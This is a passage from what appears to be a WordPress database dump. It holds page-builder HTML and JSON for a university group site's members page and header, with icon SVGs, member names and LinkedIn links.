<a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c209-outer\">\n            <div data-colibri-id=\"182-c209\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c209 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c210\" class=\"d-block style-913 style-local-182-c210 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c210-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c210-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-914 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c212\" class=\"h-text h-text-component style-915 style-local-182-c212 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c213\" class=\"style-917 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 13:07:34','2023-10-13 17:07:34','',182,'https://gsudice.dataconn.net/?p=1816',0,'revision','',0),(1817,1,'2023-10-13 13:07:34','2023-10-13 17:07:34','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 13:07:34','2023-10-13 17:07:34','',26,'https://gsudice.dataconn.net/?p=1817',0,'revision','',0),(1818,1,'2023-10-13 13:07:34','2023-10-13 17:07:34','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 